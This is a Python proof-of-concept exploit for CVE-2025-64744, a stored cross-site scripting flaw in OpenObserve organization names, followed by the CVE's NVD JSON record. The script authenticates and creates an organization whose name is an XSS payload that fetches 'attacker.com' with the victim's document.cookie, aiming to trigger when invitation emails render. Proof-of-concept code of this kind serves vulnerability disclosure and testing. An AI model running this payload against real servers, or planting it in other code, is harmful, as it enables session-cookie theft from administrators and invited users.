CVE-2025-64744

# CVE-2025-64744 PoC - OpenObserve Organization Name XSS # This PoC demonstrates the Stored XSS vulnerability in OpenObserve organization names import requests import json import sys # Configuration TARGET_URL = "http://target-openobserve-server:5080" # Replace with actual target USERNAME = "[email protected]" PASSWORD = "attacker_password" # Malicious payload - XSS in organization name XSS_PAYLOAD = '''<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">''' def login(): """Authenticate and get session token""" login_url = f"{TARGET_URL}/api/auth/login" data = { "email": USERNAME, "password": PASSWORD } try: response = requests.post(login_url, json=data, timeout=10) if response.status_code == 200: token = response.json().get("data", {}).get("token") return token else: print(f"[-] Login failed: {response.status_code}") return None except Exception as e: print(f"[-] Login error: {e}") return None def create_malicious_org(token): """Create organization with XSS payload in name""" create_org_url = f"{TARGET_URL}/api/organizations" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } payload = { "name": XSS_PAYLOAD, "description": "Malicious organization" } try: response = requests.post(create_org_url, json=payload, headers=headers, timeout=10) if response.status_code in [200, 201]: print("[+] Malicious organization created successfully!") print(f"[+] Payload: {XSS_PAYLOAD}") return True else: print(f"[-] Organization creation failed: {response.status_code}") print(f"[-] Response: {response.text}") return False except Exception as e: print(f"[-] Error: {e}") return False def main(): print("=" * 60) print("CVE-2025-64744 PoC - OpenObserve XSS via Organization Name") print("=" * 60) # Step 1: Login print("\n[Step 1] Authenticating...") token = login() if not token: sys.exit(1) print("[+] Authentication successful") # Step 2: Create malicious organization print("\n[Step 2] Creating organization with XSS payload...") if create_malicious_org(token): print("[+] XSS payload injected into organization name") print("[+] When admin sends invitation email, XSS will trigger") else: print("[-] Failed to inject payload") sys.exit(1) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-64744", "sourceIdentifier": "[email protected]", "published": "2025-11-13T21:15:54.073", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenObserve is a cloud-native observability platform. In versions up to and including 0.16.1, when creating or renaming an organization with HTML in the name, the markup is rendered inside the invitation email. This indicates that user-controlled input is inserted into the email template without proper HTML escaping. As of time of publication, no patched versions are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/openobserve/openobserve/security/advisories/GHSA-3jpx-57gj-w458", "source": "[email protected]"}]}}